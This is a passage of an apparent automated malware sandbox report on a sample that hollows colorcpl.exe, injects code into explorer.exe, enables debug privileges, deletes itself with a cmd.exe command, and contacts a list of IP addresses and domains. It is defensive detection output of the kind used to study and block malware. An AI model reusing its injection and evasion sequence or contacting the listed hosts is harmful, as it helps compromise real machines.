Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F40E1 mov eax, dword ptr fs:[00000030h]		15_2_046F40E1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F40E1 mov eax, dword ptr fs:[00000030h]		15_2_046F40E1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F40E1 mov eax, dword ptr fs:[00000030h]		15_2_046F40E1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0478B8D0 mov eax, dword ptr fs:[00000030h]		15_2_0478B8D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0478B8D0 mov ecx, dword ptr fs:[00000030h]		15_2_0478B8D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0478B8D0 mov eax, dword ptr fs:[00000030h]		15_2_0478B8D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0478B8D0 mov eax, dword ptr fs:[00000030h]		15_2_0478B8D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0478B8D0 mov eax, dword ptr fs:[00000030h]		15_2_0478B8D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0478B8D0 mov eax, dword ptr fs:[00000030h]		15_2_0478B8D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472F0BF mov ecx, dword ptr fs:[00000030h]		15_2_0472F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472F0BF mov eax, dword ptr fs:[00000030h]		15_2_0472F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472F0BF mov eax, dword ptr fs:[00000030h]		15_2_0472F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h]		15_2_047220A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h]		15_2_047220A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h]		15_2_047220A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h]		15_2_047220A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h]		15_2_047220A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047220A0 mov eax, dword ptr fs:[00000030h]		15_2_047220A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047390AF mov eax, dword ptr fs:[00000030h]		15_2_047390AF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F9080 mov eax, dword ptr fs:[00000030h]		15_2_046F9080
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04773884 mov eax, dword ptr fs:[00000030h]		15_2_04773884
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04773884 mov eax, dword ptr fs:[00000030h]		15_2_04773884
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046FC962 mov eax, dword ptr fs:[00000030h]		15_2_046FC962
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046FB171 mov eax, dword ptr fs:[00000030h]		15_2_046FB171
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046FB171 mov eax, dword ptr fs:[00000030h]		15_2_046FB171
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0471B944 mov eax, dword ptr fs:[00000030h]		15_2_0471B944
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0471B944 mov eax, dword ptr fs:[00000030h]		15_2_0471B944
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472513A mov eax, dword ptr fs:[00000030h]		15_2_0472513A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472513A mov eax, dword ptr fs:[00000030h]		15_2_0472513A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04714120 mov eax, dword ptr fs:[00000030h]		15_2_04714120
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04714120 mov eax, dword ptr fs:[00000030h]		15_2_04714120
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04714120 mov eax, dword ptr fs:[00000030h]		15_2_04714120
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04714120 mov eax, dword ptr fs:[00000030h]		15_2_04714120
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04714120 mov ecx, dword ptr fs:[00000030h]		15_2_04714120
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F9100 mov eax, dword ptr fs:[00000030h]		15_2_046F9100
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F9100 mov eax, dword ptr fs:[00000030h]		15_2_046F9100
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F9100 mov eax, dword ptr fs:[00000030h]		15_2_046F9100
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046FB1E1 mov eax, dword ptr fs:[00000030h]		15_2_046FB1E1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046FB1E1 mov eax, dword ptr fs:[00000030h]		15_2_046FB1E1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046FB1E1 mov eax, dword ptr fs:[00000030h]		15_2_046FB1E1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047841E8 mov eax, dword ptr fs:[00000030h]		15_2_047841E8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047751BE mov eax, dword ptr fs:[00000030h]		15_2_047751BE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047751BE mov eax, dword ptr fs:[00000030h]		15_2_047751BE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047751BE mov eax, dword ptr fs:[00000030h]		15_2_047751BE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047751BE mov eax, dword ptr fs:[00000030h]		15_2_047751BE
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047769A6 mov eax, dword ptr fs:[00000030h]		15_2_047769A6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047261A0 mov eax, dword ptr fs:[00000030h]		15_2_047261A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047261A0 mov eax, dword ptr fs:[00000030h]		15_2_047261A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B49A4 mov eax, dword ptr fs:[00000030h]		15_2_047B49A4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B49A4 mov eax, dword ptr fs:[00000030h]		15_2_047B49A4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B49A4 mov eax, dword ptr fs:[00000030h]		15_2_047B49A4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047B49A4 mov eax, dword ptr fs:[00000030h]		15_2_047B49A4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04722990 mov eax, dword ptr fs:[00000030h]		15_2_04722990
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0471C182 mov eax, dword ptr fs:[00000030h]		15_2_0471C182
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0472A185 mov eax, dword ptr fs:[00000030h]		15_2_0472A185
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_0473927A mov eax, dword ptr fs:[00000030h]		15_2_0473927A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047AB260 mov eax, dword ptr fs:[00000030h]		15_2_047AB260
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047AB260 mov eax, dword ptr fs:[00000030h]		15_2_047AB260
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047C8A62 mov eax, dword ptr fs:[00000030h]		15_2_047C8A62
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047BEA55 mov eax, dword ptr fs:[00000030h]		15_2_047BEA55
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F9240 mov eax, dword ptr fs:[00000030h]		15_2_046F9240
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F9240 mov eax, dword ptr fs:[00000030h]		15_2_046F9240
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F9240 mov eax, dword ptr fs:[00000030h]		15_2_046F9240
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F9240 mov eax, dword ptr fs:[00000030h]		15_2_046F9240
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04784257 mov eax, dword ptr fs:[00000030h]		15_2_04784257
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04734A2C mov eax, dword ptr fs:[00000030h]		15_2_04734A2C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04734A2C mov eax, dword ptr fs:[00000030h]		15_2_04734A2C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04713A1C mov eax, dword ptr fs:[00000030h]		15_2_04713A1C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047BAA16 mov eax, dword ptr fs:[00000030h]		15_2_047BAA16
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_047BAA16 mov eax, dword ptr fs:[00000030h]		15_2_047BAA16
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046FAA16 mov eax, dword ptr fs:[00000030h]		15_2_046FAA16
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046FAA16 mov eax, dword ptr fs:[00000030h]		15_2_046FAA16
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_04708A0A mov eax, dword ptr fs:[00000030h]		15_2_04708A0A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F5210 mov eax, dword ptr fs:[00000030h]		15_2_046F5210
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F5210 mov ecx, dword ptr fs:[00000030h]		15_2_046F5210
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F5210 mov eax, dword ptr fs:[00000030h]		15_2_046F5210
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 15_2_046F5210 mov eax, dword ptr fs:[00000030h]		15_2_046F5210

Enables debug privileges

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process token adjusted: Debug			Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 52.58.78.16 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 142.111.47.2 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.yunlimall.com
Source: C:\Windows\explorer.exe	Domain query: www.thesoulrevitalist.com
Source: C:\Windows\explorer.exe	Domain query: www.cleanxcare.com
Source: C:\Windows\explorer.exe	Network Connect: 103.120.12.113 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 148.59.128.71 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.newmopeds.com
Source: C:\Windows\explorer.exe	Domain query: www.dmgt4m2g8y2uh.net
Source: C:\Windows\explorer.exe	Domain query: www.hazard-protection.com
Source: C:\Windows\explorer.exe	Domain query: www.jonathan-mandt.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 78.31.67.91 80			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe

Memory written: C:\Users\user\Desktop\UOMp9cDcqZ.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Thread register set: target process: 3472			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe

Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 380000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Process created: C:\Users\user\Desktop\UOMp9cDcqZ.exe C:\Users\user\Desktop\UOMp9cDcqZ.exe			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000003.00000000.251486008.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Users\user\Desktop\UOMp9cDcqZ.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation			Jump to behavior
